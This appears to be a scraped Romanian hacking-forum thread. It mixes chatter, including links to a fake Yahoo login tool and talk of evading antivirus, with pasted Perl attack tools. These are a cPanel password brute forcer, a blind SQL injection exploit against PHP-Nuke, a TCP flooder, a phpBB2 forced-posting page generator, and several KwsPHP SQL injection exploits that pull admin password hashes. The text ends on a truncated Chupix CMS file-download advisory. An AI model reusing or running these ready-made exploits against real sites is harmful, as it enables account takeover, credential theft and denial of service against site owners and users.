Ras

Link: http://www.youtube.com/watch?v=16xOp9RqcY8 Aseara... Detalii aveti acolo.

#!/usr/bin/perl # Cpanel Password Brute Forcer # ---------------------------- # (c)oded By Hessam-x # Perl Version ( low speed ) # Oerginal Advisory : use IO::Socket; use LWP::Simple; use MIME::Base64; $host = $ARGV[0]; $user = $ARGV[1]; $port = $ARGV[2]; $list = $ARGV[3]; $file = $ARGV[4]; $url = "http://".$host.":".$port; if(@ARGV < 3){ print q( ############################################################### # Cpanel Password Brute Force Tool # ############################################################### # usage : cpanel.pl [HOST] [User] [PORT][list] [File] # #-------------------------------------------------------------# # [Host] : victim Host (simorgh-ev.com) # # [User] : User Name (demo) # # [PORT] : Port of Cpanel (2082) # #[list] : File Of password list (list.txt) # # [File] : file for save password (password.txt) # # # ############################################################### # (c)oded By Hessam-x / simorgh-ev.com # ############################################################### );exit;} headx(); $numstart = "-1"; sub headx() { print q( ############################################################### # Cpanel Password Brute Force Tool # # (c)oded By Hessam-x / simorgh-ev.com # ############################################################### ); open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !"; @PASSWORDS = <PASSFILE>; close PASSFILE; foreach my $P (@PASSWORDS) { chomp $P; $passwd = $P; print " [~] Try Password : $passwd "; &brut; }; } sub brut() { $authx = encode_base64($user.":".$passwd); print $authx; my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print " [-] Can not connect to the host"; print $sock "GET / HTTP/1.1 "; print $sock "Authorization: Basic $authx "; print $sock "Connection: Close "; read $sock, $answer, 128; close($sock); if ($answer =~ /Moved/) { print " [~] PASSWORD FOUND : $passwd "; exit(); } } Nu am testat.

Nemessis tu crezi ca in China sau in USA sau in alte tari nu sunt copii ca la noi? Eu cred ca da, iar acolo sunt multi chiar sub nivelul nostru. Si inca ceva... tu spui ca ai fost betiv, drogat, exmatriculat, etc. Cumva tu ai invatat cate ceva din chestiile alea... adica dupa ce ti-ai dat seama ca nu e bine te-ai indreptat... eu cred ca e mai bine sa trecem prin toate si dupaia sa tragem o linie si sa ne putem indrepta.

deci daca te loghezi in acest program se salveaza un fisier .txt in partitia C: cu numele Yahoo.txt

#!/usr/bin/perl #0day exploit for PHP-nuke <=8.0 Final #Blind sql injection attack in INSERT syntax #version for mysql >= 4.0.24, using 'brute force' #Coded by:Maciej `krasza` Kukla[krasza@gmail.com] #Screenshot: #0day exploit for PHP-nuke <=8.0 Final #Sql injection attack in INSERT syntax #Coded by:Maciej `krasza` Kukla[krasza@gmail.com] # #[+]Time normal query: 2 seconds #[+]Length user's record: 5 #[+]Length password's record: 32 #[+]Login: #admin #[+]Password: #b481ab90de84a345c665f1e4ef3c2 #[+]Super admin: #admin:b481ab90de84a345c66585e1f4cf16e4 use strict; use warnings; use LWP; my $offset=4;#It is the most important variable!! my $adres=shift or help(); my $ua = LWP::UserAgent->new; my $zadanie = HTTP::Request->new(GET => $adres); my ($respone,$komenda,$poczatek,$koniec,$czas_nor,$i,$j,$dlugosc_user,$user, $hash,$referer,$czy_dziala,$znak); banner(); $czas_nor=polacz("http://www.krasza.int.pl"); print "[+]Time normal query: $czas_nor seconds\n"; $dlugosc_user=ustal_dlugosc("aid",8); print "[+]Length user's record: $dlugosc_user\n"; print "[+]Length password's record: 32\n"; print "[+]Login:\n"; $user=brute_force_aid($dlugosc_user); print "[+]Password:\n"; $hash=brute_force_pass(32); print "[+]Super admin:\n"; print "$user:$hash\n"; ## sub brute_force_pass{ my ($dlugosc)=@_; my ($i,$j,$referer,$wynik,$dolny_zakres); for($i=1;$i<=$dlugosc;$i++){ for($j=48;$j<=122;$j++){ $referer="http://www.krasza.int.pl'),(-1, (SELECTIF((ASCII(SUBSTRING(`pwd`,".$i.", 1))=".$j.") & 1, benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` WHERE `radminsuper`=1))/*"; $czy_dziala=czy_dziala($referer); if($czy_dziala==1){ $znak=chr($j); print "$znak"; $wynik.=$znak; if($i<$dlugosc){ $i+=1; $j=47; }else{ last; } } #przeskok-optymalizacja;] if($j==57){ $j=96; } } } print "\n"; return $wynik; } sub brute_force_aid{ my ($dlugosc)=@_; my ($i,$j,$referer,$wynik,$dolny_zakres); for($i=1;$i<=$dlugosc;$i++){ for($j=48;$j<=122;$j++){ $referer="http://www.krasza.int.pl'),(-1, (SELECTIF((ASCII(SUBSTRING(`aid`,".$i.", 1))=".$j.") & 1, benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` WHERE `radminsuper`=1))/*"; $czy_dziala=czy_dziala($referer); if($czy_dziala==1){ $znak=chr($j); print "$znak"; $wynik.=$znak; if($i<$dlugosc){ $i+=1; $j=47; }else{ last; } } if($j==57){ $j=64; } if($j==90){ $j=96; } } } print "\n"; return $wynik; } sub ustal_dlugosc{ my ($pole,$len)=@_; my ($referer,$narazie_dziala_liczba,$nie_dziala_liczba); $narazie_dziala_liczba=0; $nie_dziala_liczba=65; #for($len=1;$len<64;$len++){ while($len<=64){ if($narazie_dziala_liczba==$len || $nie_dziala_liczba<=$len){ return $narazie_dziala_liczba; } $referer="http://www.krasza.int.pl'),(-1, (SELECTIF((LENGTH(`".$pole."`)>". $len.") & 1, benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` WHERE `radminsuper`=1))/*"; $czy_dziala=czy_dziala($referer); if($czy_dziala==1){ $narazie_dziala_liczba=$len+1; $len+=2; }else{ $nie_dziala_liczba=$len+1; $len-=1; } } print "[-]Exploit Failed\n"; exit; } sub czy_dziala{ my ($refik)=@_; my $czas_zapytania; $czas_zapytania=polacz($refik); if($czas_zapytania>$czas_nor+$offset){ return 1; }else{ return 0; } } sub polacz{ my ($referrer)=@_; my ($czas,$czas_poczatek,$czas_koniec); $zadanie->referer($referrer); $czas_poczatek=time(); $respone=$ua->request($zadanie); $respone->is_success or die "$adres : ",$respone->message,"\n"; $czas_koniec=time(); $czas=$czas_koniec-$czas_poczatek; return $czas; } sub banner{ print "0day exploit for PHP-nuke <=8.0 Final\n"; print "Blind sql injection attack in INSERT syntax\n"; print "version mysql >= 4.0.24, using 'brute force'\n"; print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n\n"; } sub help{ print "0day exploit for PHP-nuke <=8.0 Final\n"; print "Blind sql injection attack in INSERT syntax\n"; print "version mysql >= 4.0.24, using 'brute force'\n"; print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n"; print "Use:\n"; print "\tperl exploit.pl [url]\n"; print "\t[url]-vicitim webpage with index.php\n"; print "Example:\n"; print "\tperl bruteforce.pl http://phpnuke.org/index.php\n"; exit(0); }

Download: http://rapidshare.com/files/57175959/Yahoo_Fake.rar trebuia sa cauti pe forum pt ca exista sigur...

s-a postat acum ceva timp pe rst o metoda in care puneai nush ce combinatie de cifre si nu mai puteai sa apelezi si nici sa primesti apeluri.

Contine "GetFile()" si prin acest "GetFile()" poti sa downloadezi din calculatorul victimei. Remote execution depinde de setarile IE-ului...

imi explica si mie cineva ce face acest exploit? ca sa nu mor prost...

titlul este pus la misto... nu ai vazut acele ""?

poate ai dat tu alt nume la exploit... cand i-ai dat copy si paste si dupaia save ... ce nume i-ai dat? verifica...

Eu am nod32 versiunea 2539 si nu-l detecteaza...nu stiu ce sa zic...nici nu m-am obosit sa vad daca il detecteaza sau nu...pentru ca nu e cine stie, are cateva functii, e facut de mine si in plus e si criptat...Cred ca o fi de la functia care il face sa ruleze la startup. Limo11 nu ai citit ce a scris escalation... il detecteaza nortonul pentru ca are functia care il face sa ruleze la startup. Stiu treaba asta pt ca acum ceva timp am facut niste "virusi"(sa zic asa) care aveau functie de startup si doar nod32-ul ii detecta.

cred ca sunt 4 ani

primul meu telefon nokia 3310

@Renegade: ma distrez si eu acum cat sunt mic.... @katmai: administratoru' a vrut sa ne puna banci dar nu acolo unde am pus-o noi... vroia sa faca cerere la primarie si sa faca parc pe terenu' nostru de fotbal... si noi nu am vrut ). Asta era acum cativa ani si nu vroiam noi... dar acum ne pare rau

daaaaa

Link: http://www.youtube.com/watch?v=9_yQDnfe2xA Link: http://speed-blog.net/2007/09/18/nu-avem-banca-pai-furam-una-atunci/ In seara asta eu si cu tov mei nu aveam ce sa facem si ne-am hotarat sa... vedeti in acel video...

marfa!! dabea astept sa il trimit la manelisti :twisted: :twisted:

#!/usr/bin/perl use IO::Socket::INET; print "host: "; chomp($host=<STDIN>); print "port: "; chomp($port=<STDIN>); print "packets: "; chomp($packets=<STDIN>); print "Start flood target -> $host:$port\n"; $x = 0; while ($x < $packets) { $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port); $x += 1; } if ($x eq $packets) { print "$packets packet[s] send successfully"; } else { print "There is a problem with packet`s sending"; } close($socket); search pe google... EDIT Download Perl: http://rapidshare.com/files/56619845/Perl.rar

--------------------------------------------------------------- ____ __________ __ ____ __ /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ | | | \ | |/ \ \___| | /_____/ | || | |___|___| /\__| /______ /\___ >__| |___||__| \/\______| \/ \/ --------------------------------------------------------------- [url]Http://www.inj3ct-it.org[/url] Staff[at]inj3ct-it[dot]org -------------------------------------------------------------- 0day Auto Sender Post phpBB2 --------------------------------------------------------------- # Coded by TuoNuX # Description: autosendform generator --------------------------------------------------------------- --------------------------------------------------------------- asf.pl --------------------------------------------------------------- #/usr/bin/perl #0day Auto Sender Post phpBB2 #TuoNuX@hotmail.it #[url]http://www.localh0st.altervista.org[/url] #[url]http://www.hackingz0ne.altervista.org[/url] print q { _____________________________________________________________________ ___ _ _ __ _ |_ _|_ _ ___ | \ | _ _ \ \/ * 0day Auto Sender Post phpBB2 | || | |/ . \| || | | \ \ * [email]TuoNuX@hotmail.it[/email] |_|`___|\___/|_\_|`___|_/\_\ * [url]http://www.localh0st.altervista.org[/url] * [url]http://www.hackingz0ne.altervista.org[/url] 0day Auto Sender Post phpBB2 _____________________________________________________________________ }; print q { [+]Insert host site : [-]Indirizzo: }; $indirizzo = <stdin>; chomp($indirizzo); print q { _____________________________________________________________________ [+]Insert the forum path (for example /phpBB/) : [-]Cartella: }; $cartella = <stdin>; chomp($cartella); print q { _____________________________________________________________________ [+]Insert ID section ( number after "?f=" ): [-]ID Sezione: }; $id = <stdin>; chomp($id); print q { _____________________________________________________________________ [+]Insert Topic Title : [-]Titolo: }; $titolo = <stdin>; chomp($titolo); print q { _____________________________________________________________________ [+]Insert the body topic : [+]Yuc can use also the BB code es: [img=urlimmagine] [-]Testo: }; $testo = <stdin>; chomp($testo); print q { _____________________________________________________________________ [+]Insert the victim sid , don't write everyone if there isn't it : [-]Sid: }; $sid = <stdin>; chomp($sid); $sito = "http://$indirizzo$cartella"; print "\n----------------Riepilogo----------------------\n\n"; print "Forum => $sito\n"; print "ID Section => $id\n"; print "Title => $titolo\n"; print "Message => $testo\n"; print "SID => $sid\n\n"; print "----------------Riepilogo----------------------\n\n"; print "Enter for continued...."; <stdin>; $m1 = q {<html><head><body><form action="}; $m2 = "$sito"; $m3 = q {posting.php" method="post" name="post"><textarea name="message" class="post">}; $m4 = "$testo"; $m5 = q {</textarea><input type="hidden" value="}; $m12 = "\n\nTuoNuX 0day phpBB2 Exploit\n\n\n"; $m6 = "$titolo"; $m7 = q {" class="post" tabindex="2" style="width: 450px;" maxlength="60" size="45" name="subject"/><input type="hidden" value="" class="post" maxlength="255" size="50" name="poll_title"/><input type="hidden" value="" class="post" maxlength="255" size="50" name="add_poll_option_text"/><input type="hidden" value="0" class="post" maxlength="3" size="3" name="poll_length"/><input type="hidden" value="Anteprima" class="mainoption" name="preview" tabindex="5"/><input type="hidden" value="Invia" class="mainoption" name="post" tabindex="6" accesskey="s"/><input type="hidden" name="mode" value="newtopic" /><input type="hidden" name="f" value="}; $m8 = "$id"; $m9 = q {"> <input type="hidden" name="sid" value="}; $m10 = "$sid"; $m11 = q {" /></form><script>document.post.submit()</script></html></head></body>}; $html = "$m1$m2$m3$m4$m12$m5$m6$m7$m8$m9$m10$m11"; open ( FILE , ">phpBB20dayexploit.html" ) || die ( "" ); print FILE $html; close ( FILE ); print q { _____________________________________________________________________ ___ _ _ __ _ |_ _|_ _ ___ | \ | _ _ \ \/ * 0day Auto Sender Post phpBB2 | || | |/ . \| || | | \ \ * [email]TuoNuX@hotmail.it[/email] |_|`___|\___/|_\_|`___|_/\_\ * [url]http://www.localh0st.altervista.org[/url] * [url]http://www.hackingz0ne.altervista.org[/url] 0day Auto Sender Post phpBB2 Page Saved !!!!... Work this script on a webspace and you must visit it to victim. Best ReGaRdS FoR localh0st & hackingz0ne _____________________________________________________________________

si eu la fel...

cam naspa treaba... poate omu e incepator si d'asta hexeaza.

stats module: ################################################### # Script..........................: KwsPHP ver 1.0 stats Module # Script Site..................: [url]http://kws.koogar.org/[/url] # Vulnerability...............: Remote SQL injection Exploit # Access.........................: Remote # level.............................: Dangerous # Author..........................: S4mi # Contact.........................: S4mi[at]LinuxMail.org #################################################### #Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39 # #################################################### # This Exploit Work Only When magic_quotes_gpc Is OFF # #Usage : C:\Xploit.pl 127.0.0.1 /KswPHP/ admin #Result Screen Shot : #+**********************+ # Connecting ...[OK] # Sending Data ...[OK] # # + Exploit succeed! Getting admin information. # + ---------------- + # + Username: admin # + Password: e10adc3949ba59abbe56e057f20f883e ################################################### #vuln code : \modules\stats\index.php line ~ 700 - 720 #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # [code] # elseif(isset($aff) && ($aff=="browser")) # { # if(isset($typenav)) # { # bloc_head("Statistiques des navigateurs ".$liste_navigateurs[$typenav]); # # $tot_nav=0; # # $requete=reqmysql("SELECT SUM(hit) as tot FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `type` ASC "); # # while ($ligne = mysql_fetch_object($requete)) # { # $tot_nav = $ligne->tot; # } # $requete=reqmysql("SELECT * FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `hit` DESC"); # ######################################################### #!/usr/bin/perl use IO::Socket ; &header(); &usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2])); $host = $ARGV[0]; $path = $ARGV[1]; $user = $ARGV[2]; syswrite STDOUT ,"\n Connecting ..."; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); die "\n Unable to connect to $host\n" unless($sock); syswrite STDOUT, "[OK]"; $inject = "9999'/**/UNION/**/SELECT/**/0,0,pass,pseudo/**/FROM/**/users/**/WHERE/**/pseudo='$user'/*"; syswrite STDOUT ,"\n Sending Data ..."; print $sock "POST $path/index.php?mod=stats&aff=browser&typenav=$inject HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Connection: Close\n\n"; syswrite STDOUT ,"[OK]\n\n"; while($answer = <$sock>){ if ($answer =~ /nav_(.*?).png/){ print "+ Exploit succeed! Getting admin information.\n"; print "+ ---------------- +\n"; print "+ Username: $user\n"; print "+ Password: $1\n"; print "+ ----Have Fun---- +\n"; print "+ You don't need to crack the hash password \n"; print "+ Just login with ur owen information and edit the cookies\n"; } } sub usage{ print "\nUsage : perl $0 host /path/ UserName "; print "\nExemple : perl $0 www.victim.com /KwsPHP/ admin\n"; exit(0); } sub header(){ print q( ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Script......................: KwsPHP ver 1.0 stats Module # Script Site.................: http://kws.koogar.org/ # Vulnerability...............: Remote SQL injection Exploit # Access......................: Remote # level.......................: Dangerous # Author......................: S4mi # Contact.....................: S4mi[at]LinuxMail.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ); } member_space module: #!/usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; $host = $ARGV[0]; $User = $ARGV[1]; $passwd = $ARGV[2]; $url = "http://".$host; $port = "80"; print q( ################################################################ # Script....................: KwsPHP v1.0 Member_Space Module # # Script Site...............: [url]http://kws.koogar.org/[/url] # # Vulnerability.............: Remote SQL injection Exploit # # Access....................: Remote # # level.....................: Dangerous # # Author....................: S4mi # # Contact...................: S4mi[at]LinuxMail.org # # This Exploit Work Only When magic_quotes_gpc Is OFF # ################### (C)oded By S4mi ############################ ); if (@ARGV < 3) { print " # usage : xpl.pl host/path/ User Passwd\n"; print " # e.g : xpl.pl 127.0.0.1/KwsPHP/ zaz luks\n"; exit(); } print " [~] User/Password : $User/$passwd \n"; print " [~] Host : $url \n"; $xpl = LWP::UserAgent->new() or die; $cookie_jar = HTTP::Cookies->new(); print " [~] Logining ...\n"; $xpl->cookie_jar( $cookie_jar ); $login = $xpl->post($url.'index.php', Content => [ "pseudo" => "$User", "pass" => "$passwd", "submit" => "Se connecter", ],); $evil0 = "\x39\x39\x39\x39\x39\x27\x2F\x2A\x2A\x2F\x55\x4E\x49\x4F\x4E" ."\x2F\x2A\x2A\x2F\x53\x45\x4C\x45\x43\x54\x2F\x2A\x2A\x2F\x6E" ."\x75\x6C\x6C\x2C\x63\x6F\x6E\x63\x61\x74\x28\x63\x68\x61\x72" ."\x28\x31\x31\x37\x2C\x31\x31\x35\x2C\x31\x30\x31\x2C\x31\x31" ."\x34\x2C\x31\x31\x30\x2C\x39\x37\x2C\x31\x30\x39\x2C\x31\x30" ."\x31\x2C\x35\x38\x29\x2C\x70\x73\x65\x75\x64\x6F\x2C\x63\x68" ."\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x63\x6F\x6E\x63\x61\x74" ."\x28\x63\x68\x61\x72\x28\x31\x31\x32\x2C\x39\x37\x2C\x31\x31" ."\x35\x2C\x31\x31\x35\x2C\x31\x31\x39\x2C\x31\x31\x31\x2C\x31" ."\x31\x34\x2C\x31\x30\x30\x2C\x35\x38\x29\x2C\x70\x61\x73\x73" ."\x2C\x63\x68\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x6E\x75\x6C" ."\x6C\x2F\x2A\x2A\x2F\x46\x52\x4F\x4D\x2F\x2A\x2A\x2F\x75\x73" ."\x65\x72\x73\x2F\x2A\x2A\x2F\x57\x48\x45\x52\x45\x2F\x2A\x2A" ."\x2F\x69\x64\x3D\x31\x2F\x2A"; $offset = "\x65\x73\x70\x61\x63\x65\x5F\x6D\x65\x6D\x62\x72\x65\x26\x61" ."\x63\x3D\x63\x61\x72\x6E\x65\x74\x26\x61\x63\x74\x3D\x65\x64" ."\x69\x74\x65\x72\x26\x69\x64\x3D"; $target = $xpl->get($url."index.php?mod=$offset$evil0"); if($target->as_string =~ /value="username:(.*?"/) { $zaz = $1; print " [+] Exploit succeed! Getting admin information. \n"; print " [+] ------------------------------------------- \n"; } if($target->as_string =~ /value="password:(.*?"/) { $luks = $1; print " [+] UserName : $zaz \n"; print " [+] Password : $luks \n"; } else { print " [-] Exploit Failed ! \n"; } print "\n#############################################################\n"; login.php: ################################################### # Script..........................: KwsPHP ver 1.0 # Script Site..................: [url]http://kws.koogar.org/[/url] # Vulnerability...............: login.php Remote SQL injection Exploit # Access.........................: Remote # level.............................: Dangerous # Author..........................: S4mi # Contact.........................: S4mi[at]LinuxMail.org #################################################### #Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39 # #################################################### # This Exploit work Only When magic_quotes_gpc Is OFF # #Usage : C:\Xploit.pl 127.0.0.1 /KswPHP/ admin #Result Screen Shot : #+**********************+ # Connecting ...[OK] # Sending Data ...[OK] # # + Exploit succeed! Getting admin information. # + ---------------- + # + Username: admin # + Password: e10adc3949ba59abbe56e057f20f883e ################################################### #!/usr/bin/perl use IO::Socket ; &header(); &usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2])); $host = $ARGV[0]; $path = $ARGV[1]; $user = $ARGV[2]; syswrite STDOUT ,"\n Connecting ..."; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); die "\n Unable to connect to $host\n" unless($sock); syswrite STDOUT, "[OK]"; $inject = "union%20all%20select%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users%20where%20pseudo='$user'/*&pass=ZAZ&verifer=Se%20Loguer"; syswrite STDOUT ,"\n Sending Data ..."; print $sock "POST $path/login.php?pseudo=%22$inject HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Connection: Close\n\n"; syswrite STDOUT ,"[OK]\n\n"; while($answer = <$sock>){ if ($answer =~ /class="messagelogin">(.*?) /){ print "+ Exploit succeed! Getting admin information.\n"; print "+ ----------------------- +\n"; print "+ Username: $user\n"; print "+ Password: $1\n"; print "+ -------Have Fun--------- +\n"; print "+ You don't need to crack the hash password \n"; print "+ Just login with ur owen information and edit the cookies\n"; } } sub usage{ print "\nUsage : perl $0 host /path/ UserName "; print "\nExemple : perl $0 [url]www.victim.com[/url] /KwsPHP/ admin\n"; exit(0); } sub header(){ print q( ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Script......................: KwsPHP ver 1.0 # Script Site.................: [url]http://kws.koogar.org/[/url] # Vulnerability...............: Remote SQL injection Exploit # Access......................: Remote # level.......................: Dangerous # Author......................: S4mi # Contact.....................: S4mi[at]LinuxMail.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ); }

# Chupix CMS 0.2.3 (download.php) Remote File Download Vulnerability# P.Script : http://sourceforge.net/project/showfiles.php?group_id=134930 ################################download.php################################ Lain:18->57 -> ******************************************************************************************************************** if(isset($_GET['fichier'])){ <--------------XXXX * // téléchargement du fichier * $file = "archives/". $_GET['repertoire'] ."/". $_GET['fichier'];<--------------XXXX * $fichier_txt = "archives/". $_GET['repertoire'] ."/cpt/". $_GET['fichier'] .".php" * $repertoire = "archives/". $_GET['repertoire'] ."/cpt/"; * if(is_file($fichier_txt)){ * $fp = @fopen($fichier_txt, "r"); <--------------XXXX * $result = fread($fp, filesize ($fichier_txt)); * fclose($fp); * $result = str_replace("<?php ", "", $result); * $result = str_replace("?>", "", $result); * * $num = trim($result); * }else{ * $num = 0; * } * $num++; * * $msg = "<?php ". $num ." ?>"; * * if(!(is_dir($repertoire))){ * mkdir ($repertoire, 0755); * } * * $fp = @fopen($fichier_txt, "w+");<--------------XXXX * if (flock($fp, LOCK_EX)) { // pose un verrou exclusif * fwrite($fp, $msg); * flock($fp, LOCK_UN); // lib

la 5 ani... :shock: :shock: :shock: